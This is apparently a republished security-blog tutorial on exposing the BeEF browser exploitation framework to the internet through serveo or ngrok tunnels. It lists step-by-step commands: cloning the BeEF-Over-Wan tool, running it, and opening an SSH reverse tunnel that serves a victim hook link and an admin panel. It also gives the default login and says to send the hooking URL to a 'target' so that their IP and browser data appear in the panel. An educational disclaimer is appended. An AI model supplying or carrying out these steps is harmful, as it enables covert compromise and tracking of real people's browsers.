Home security App - Mobile Applications protect security Browser Exploitation Framework Over Wan (Without Port Forwarding)

Browser Exploitation Framework Over Wan (Without Port Forwarding)

179
0


Beef Xss Framework  - Beef Xss Framework - Browser Exploitation Framework Over Wan (Without Port Forwarding)

Beef Xss is a browser tool. It mainly focuses on client-side attacks and web-based browsers. It helps a penetration tester to understand past the network perimeter and client system. Its available in Kali Linux and other penetration testing operating systems by Default.

Prerequisites – Beef Xss Framework

  1. Ngrok  or Serveo
  2. Beef Over Wan 
  3. KALI LINUX

You can use ngrok or serveo, however, ngrok doesn’t allow running multiple tunnels in the free version. so we will go with serveo. Scroll down for the on ngrok.

Step 1 :
Boot up Kali Linux and download beef over by typing in the terminal

git clone https://github.com/stormshadow07/BeeF-Over-Wan.git

- 1 - Browser Exploitation Framework Over Wan (Without Port Forwarding)

Step 2 :

Now navigate into the directory by typing the commands.

cd BeeF-Over-Wan

chmod +x BeeFOverWan.py && python BeeFOverWan.py

type 1 & press enter

- 2 - Browser Exploitation Framework Over Wan (Without Port Forwarding)

Step 3 :

open a new terminal to run serveo type in the command

 ssh -R 80:localhost:80 -R 8090:localhost:3000 serveo.net 

- 3 - Browser Exploitation Framework Over Wan (Without Port Forwarding)

make a note here the HTTP traffic URL is to be pasted in the other terminal, where the one pointing to the 8090 needs to be pasted for the admin interface beef xss framework.

victim link: opposui.serveo.net

admin URL: serveo.net:8090

Step 4 :

Paste the URLs in the other terminal where the beef over wan script is running.

- 4 1 - Browser Exploitation Framework Over Wan (Without Port Forwarding)

Step :

Sign in to the admin, Do remember the URL will be different for you guys so make sure you type in the correct one. The default username is beef and password is beef.

- 5 - Browser Exploitation Framework Over Wan (Without Port Forwarding)

Step 6 :

Now pass on the hooking URL to the target, Once the target clicks it. You should be able to see their IP address and browser information in your admin panel.

Here you can see the video demonstration of Beef Xss Framework over WAN.

 

Disclaimer

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and www.gbhackers.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here